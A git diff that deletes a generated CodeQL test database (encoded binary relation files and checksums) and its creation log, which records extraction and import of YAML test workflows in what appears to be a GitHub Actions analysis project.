z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009F3 HW`Vx|E&&!+ 
diff --git a/ql/src/test-db/db-yaml/default/yaml.rel b/ql/src/test-db/db-yaml/default/yaml.rel deleted file mode 100644 index 529b4a834dece968ff95f48071bca09a7a2963c7..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7992 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 Q!LfNS=X`hY=Dm*lKmT;wC;$Ke diff --git a/ql/src/test-db/db-yaml/default/yaml.rel.checksum b/ql/src/test-db/db-yaml/default/yaml.rel.checksum deleted file mode 100644 index a3783e268b8d3866cb97455ff14cd484ab0b8d47..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 ScmZQzU|?hbf)7vo?g9V^eFH)O 
diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel b/ql/src/test-db/db-yaml/default/yaml_locations.rel deleted file mode 100644 index 014f03a3a638a16c87b040ee21668cc0ff098479..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2664 zcmWN~QxqLW06@VPHFg@?wr$&uZQHhO+iqhtb{gBZt;IqCk8QzLo8wwp9CbN28l>a5~`DwWF#jADM>|Y(vX&Pq^BAg$V)~t zk(n%HB^%kvLk@D1i`?X+H2En&K?+frA{3<<#VJ8aN>PTYl%*WysX#?4QJE^#;taK^ zLtW}op9VDKG>vFX6V}s|W;CY-Eont-I?#r;w4*&8=|pGN(S?C@r5oMpK~H+on*sEp zFa7AxAjUJ8Aq-_0!x_OyMlqT(jAa}XSj$8vF_|e$Wg63&!Axc`n>oy79`jkl0v57} z#Vlbd%UI3|R3D%ZGf9Yt?&lUv;84tKd{KeFEE2M>72BOddFr#$01 zFL=o-zVn(lyyYG5`M^g$@tH4tfTJ9w~`W0uqvfL?k8&$w^8wQjwZ83?VJ)NY7w0kdaJeCJR}~Ms{+L zlUxiUHzmkJUhLRG5MnHtpOFKSVn zI@F~e^=Uvu8qt_0G^G>GXif`S(u&r!p)KubPX{{Eg@JUX8{O$aPkPatKJ=v@{TaY; z_A!EyjAArn7|S^JGM))cWDk>=%oL_Fjp@u_H#6D9EM_x@xy)le3s}e^7PEwnEM*zX zS;0zHv6?lkWgY9;z-D%_g}?cSt!!gEJJ`woKpQFW z4CnZdvs~m7m%W=&uW*%X)*19VH@L|yZgYpb+~YnEc<6k3eZ+en^Mt27<2f&Q$va;0 znm4@VgZn}BBcJ%p7rye1@BH8=zxeHZ07K9O1S2>h_=AvyA~azLOE|(4frvyRGVzH* zRHE@G(TPD!ViB7-#3ddHNk<|QlZ2!sBRMHZNh(s4hO}g16P^DMC?7QH>rj>?p$0u`x571~ghYE-8NHTjEL)TRz~sYh$- z(}0FFqA^WqN;8_%f|j(RE&XUmdpgjOPIRUVJ?Tm}y3>PR^rjDe>CXrTFpxnEW(Y$W w#&AY6hOw+*9OIe5L?$trDNJP=)0x3cW-*&NEN3pun8$n;u#iP8W(iCG2Txl!IsgCw diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum deleted file mode 100644 index bb0c636593a1f0c3ca10cb8d7337d3771bfd6e82..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hb0!AH1O#lGM09gP4 
diff --git a/ql/src/test-db/db-yaml/default/yaml_scalars.rel b/ql/src/test-db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index e045b05d47e291009889305846e60f9c1b64b7a1..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3048 zcmYk;d+gU!9LMp`Ihb3h7)ta-E@7^r%cv}Vt`(U}X-P|JmYB2<=1#dKA++Cq%YDY? z&deWXjm>6;G50a|xy-CJb9p^K-{)`h-pFGyeq5^N-Q{q@Sc&%W;}#9j`~GKUp)+WX&3<>I2iCmUd;@L1{D6C~}+G zs=LNnntaaFqtnmT?MOIg}Y8tY- zPVEg8dSd$fHS;{6*`J4WCw;HxxqX^_ zTc_E#N79(PC+)E`>V&i>(ilH6?U^)+J$$xR(~$Y|n#^C+Q_{bz+2>dFsp((S?A_~{ z{NK<#?@i6QSg$!JZ|Q02-_x9v_cdqvL(Mt)SWi#?sbGM z|ES6NXWdEvtLFE=>lx|)(B%AQ8guugZAhcYd1D&ml|PrRnkHwzRR541%BK3< zcni(%x6;Y24AA_Zj5xb<;+-7N87o6{zE_1TsQk9@p47mYvrY|)M|9Z?jybPXaxUCw zD)SZYFqNFkAze0^yBwx@?%{e^%$`xnzl`gWZ(%t~=MEO`0M&`foyxk(q%OIGg&Zm7 zKdDQ;m*o^qKAcM`dsH}!6wl&3QF*6wW|!?eXX`w_u$L6`%SliM&TR9cu&00@w`)6)OZqRH(uO>SRkp8J*NE_|)Y^E*v$Kj`7{Pr4KTqPYvd zY3>5w8H)KgblKj8jhcM^(q#U(=2`#hkxf%K(V3@irpL#d>&#QP)VT{aziTV=)a2M! z_PTDTJ8|-AE6=Sv=-lJl|No-wbxn@_dtH-VTiNTHjN0++bi!XDU_m^pJIr^l9-(s=>S&#{)NwjvHS2CG>#7r4HGJP{-m|SS@v(Yr z+@mjwv+lOCzjd-EtEoEsTTj=l{|tReeAfSdKV6gUIl2?i(qubZ&xq$}vYi`~OV(BA zIZn3o9Vgp`j Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. 
-[2024-02-03 10:17:51] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:51] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-02-03 10:17:51] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. 
-[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. -[2024-02-03 10:17:52] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - 
info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. 
Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-02-03 10:17:52] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test -[2024-02-03 10:17:52] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-02-03 10:17:52] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-02-03 10:17:52] [PROGRESS] database init> Calculated baseline information for languages: (387ms). -[2024-02-03 10:17:52] [PROGRESS] database init> Resolving extractor yaml. -[2024-02-03 10:17:52] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:52] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:52] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. This in-progress database is ready to be populated by an extractor. -[2024-02-03 10:17:52] Plumbing command codeql database init completed. 
-[2024-02-03 10:17:52] [PROGRESS] database create> Running build command: [] -[2024-02-03 10:17:52] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:52] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. -[2024-02-03 10:17:52] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] -[2024-02-03 10:17:52] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] -[2024-02-03 10:17:53] Plumbing command codeql database trace-command completed. -[2024-02-03 10:17:53] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:53] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:53] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db... 
-[2024-02-03 10:17:53] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml -[2024-02-03 10:17:53] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache/version does not exist -[2024-02-03 10:17:53] Tuple pool not found. Clearing relations with cached strings -[2024-02-03 10:17:53] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode clear. -[2024-02-03 10:17:53] Sequence stamp origin is -6222583521912648850 -[2024-02-03 10:17:53] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Trimming completed (7ms): Purged everything. 
-[2024-02-03 10:17:53] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml -[2024-02-03 10:17:53] Found 8 TRAP files (16.41 KiB) -[2024-02-03 10:17:53] [PROGRESS] dataset import> Importing TRAP files -[2024-02-03 10:17:53] Importing changed-files.yml.trap.gz (1 of 8) -[2024-02-03 10:17:53] Importing inter1.yml.trap.gz (2 of 8) -[2024-02-03 10:17:53] Importing no-flow1.yml.trap.gz (3 of 8) -[2024-02-03 10:17:53] Importing no-flow2.yml.trap.gz (4 of 8) -[2024-02-03 10:17:53] Importing simple1.yml.trap.gz (5 of 8) -[2024-02-03 10:17:53] Importing simple2.yml.trap.gz (6 of 8) -[2024-02-03 10:17:53] Importing test.yml.trap.gz (7 of 8) -[2024-02-03 10:17:53] Importing sourceLocationPrefix.trap.gz (8 of 8) -[2024-02-03 10:17:53] [PROGRESS] dataset import> Merging relations -[2024-02-03 10:17:53] Merging 1 fragment for 'files'. -[2024-02-03 10:17:53] Merged 56 bytes for 'files'. -[2024-02-03 10:17:53] Merging 1 fragment for 'folders'. -[2024-02-03 10:17:53] Merged 80 bytes for 'folders'. -[2024-02-03 10:17:53] Merging 1 fragment for 'containerparent'. -[2024-02-03 10:17:53] Merged 128 bytes for 'containerparent'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_scalars'. -[2024-02-03 10:17:53] Merged 3048 bytes (2.98 KiB) for 'yaml_scalars'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml'. -[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'yaml'. -[2024-02-03 10:17:53] Merging 1 fragment for 'locations_default'. -[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'locations_default'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_locations'. -[2024-02-03 10:17:53] Merged 2664 bytes (2.60 KiB) for 'yaml_locations'. -[2024-02-03 10:17:53] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-02-03 10:17:53] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-02-03 10:17:53] Saving string and id pools to disk. -[2024-02-03 10:17:54] Finished importing TRAP files. 
-[2024-02-03 10:17:54] Read 77.48 KiB of uncompressed TRAP data. -[2024-02-03 10:17:54] Relation data size: 21.45 KiB (merge rate: 1.20 MiB/s) -[2024-02-03 10:17:54] String pool size: 2.05 MiB -[2024-02-03 10:17:54] ID pool size: 1.03 MiB -[2024-02-03 10:17:54] [PROGRESS] dataset import> Finished writing database (relations: 21.45 KiB; string pool: 2.05 MiB). -[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] Plumbing command codeql dataset import completed. -[2024-02-03 10:17:54] [PROGRESS] database finalize> TRAP import complete (817ms). -[2024-02-03 10:17:54] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-02-03 10:17:54] [PROGRESS] database cleanup> TRAP files cleaned up (6ms). -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Scratch directory cleaned up (0ms). -[2024-02-03 10:17:54] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml. -[2024-02-03 